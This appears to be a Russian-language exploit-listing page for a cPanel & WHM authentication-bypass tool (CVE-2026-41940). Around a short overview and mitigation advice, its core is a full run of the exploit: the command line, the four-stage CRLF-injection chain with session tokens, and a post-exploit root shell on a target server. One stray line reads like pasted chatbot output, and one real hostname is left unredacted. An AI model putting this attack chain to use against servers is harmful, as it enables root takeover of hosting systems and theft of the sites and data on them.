## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-0XBLACKASH-CVE-2026-41940
# ⚠️ CVE-2026-41940 — Обход аутентификации cPanel и WHM

* * *
  
### **Критический обход предварительной аутентификации в cPanel и WHM**
* * *
## 📌 Обзор
**CVE-2026-41940** — это **критическая уязвимость обхода аутентификации** , затрагивающая **cPanel и WHM** , а также **WP Squared**.
Неаутентифицированный удалённый злоумышленник может полностью обойти процедуру входа и получить **полный административный доступ (root/WHM)** к серверу.
Уязвимость **активно эксплуатировалась в дикой природе** до выпуска исправления.
* * *
## 🎯 Серьёзность
* * *
## 🛠️ Затронутые продукты
* **cPanel и WHM** — все версии после 11.40 до выхода исправления
* **WP Squared** — версии до **136.1.7**
> **~1,5 миллиона** экземпляров cPanel потенциально были подвержены уязвимости на момент раскрытия информации.
* * *
## 🔥 Воздействие
Успешная эксплуатация позволяет злоумышленникам:
* Получить полный доступ WHM/root
* Захватить все размещённые веб-сайты и учётные записи
* Изменять конфигурации сервера
* Похищать конфиденциальные данные
* Внедрять постоянные бэкдоры
* * *
### ✅ Вот как выглядит УСПЕХ (как на скриншоте Eye Security, который вы показывали):
Если всё работает, вы должны увидеть нечто подобное:
root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ sudo python3 CVE-2026-41940.py -u https://xx.xx.xx.xx:2087 --action shell
[sudo] password for kali:
██████╗ ██╗ ██╗██████╗ ██╗ █████╗ ██████╗██╗ ██╗ █████╗ ███████╗██╗ ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║ ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║ ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║ ███████║██║ █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║ ██╔══██║██║ ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║ ██║╚██████╗██║ ██╗██║ ██║███████║██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
CVE-2026-41940 — cPanel & WHM Auth Bypass via CRLF Injection
4-stage: preauth → CRLF inject → propagate → verify → post-exploit
Author : Ashraf Zaryouh / @0xBlackash
Configuration:
Targets : 1
Threads : 10
Timeout : 15s
Action : shell
13:41:18 [SCAN] Starting 4-stage exploit chain... https://xx.xx.xx.xx:2087
13:41:19 [INFO] Canonical hostname discovered: server.xxxxxxx.xx
13:41:19 [INFO] Canonical: server.softsms.in
13:41:19 [STEP] Stage 1/4 — Minting preauth session...
13:41:20 [ OK] Stage1: preauth session = :W43DhFApxxxD8Jdw...
13:41:20 [STEP] Stage 2/4 — CRLF injection via Authorization header...
13:41:21 [ OK] Stage2: HTTP 307 → token=/cpsess263xxxx267
13:41:21 [STEP] Stage 3/4 — Firing do_token_denied gadget (raw→cache)...
13:41:22 [ OK] Stage3: HTTP 401 — do_token_denied gadget fired
13:41:22 [STEP] Stage 4/4 — Verifying WHM root access...
13:41:24 [INFO] Stage4: HTTP 200 {"version":"11.86.0.40"}
13:41:24 [PWND] CVE-2026-41940 CONFIRMED — WHM root access! https://xx.xx.xx.xx:2087
13:41:24 [PWND] Token : /cpsess2634xxxx267
13:41:24 [PWND] Session : :W43DhFApxxxD8Jdw...
13:41:24 [PWND] Version : 11.86.0.40
13:41:24 [PWND] API URL : https://xx.xx.xx.xx:2087/cpsess2634xxxx267/json-api/version
13:41:24 [ API] Running post-exploit action: shell
════════════════════════════════════════════════════════════
WHM Shell — server.xxxxxxx.xx
Version: CVE-2026-41940 | Auth: CRLF bypass
Type 'help' for commands, 'exit' to quit
════════════════════════════════════════════════════════════
some-email@example.com ▶ id
13:41:28 [ API] gethostname → HTTP 500
uid=0(root) gid=0(root) groups=0(root)
some-email@example.com ▶ exit
Exiting shell.
══════════════════════════════════════════════════════════════════════
CVE-2026-41940.py — CVE-2026-41940 Scan Complete
Time: 13.9s · Targets: 1
──────────────────────────────────────────────────────────────────────
⚡ 1 VULNERABLE TARGET(S)
Target : https://xx.xx.xx.xx:2087
Version : 11.86.0.40
Token : /cpsess263xxxx267
API URL : https://xx.xx.xx.xx:2087/cpsess2634xxxx267/json-api/version
Session : :W43DhFApxxxD8Jdw...
Evidence : {"version":"11.86.0.40"}
══════════════════════════════════════════════════════════════════════
* * *
## ✅ Исправленные версии
**Исправление выпущено 28 апреля 2026 года**
* Обновите **cPanel и WHM** до последней сборки
* Обновите **WP Squared** до версии **136.1.7** или новее
**Рекомендуются немедленные действия**
* * *
## 🛡️ Смягчение последствий и защита
* **Немедленно** обновитесь до последней версии
* Заблокируйте публичный доступ к портам `2082`, `2083`, `2086`, `2087`
* Включите правила WAF (Cloudflare, ModSecurity и т. п.)
* Используйте белые списки IP или VPN для управленческого доступа
* * *
## 📚 Ссылки
* NVD — CVE-2026-41940
* watchTowr Labs — технический разбор
* Официальное уведомление безопасности cPanel
* Каталог CISA KEV
* * *
* * *
**Сделано с ❤️ для сообщества специалистов по безопасности**
**Последнее обновление: май 2026 года**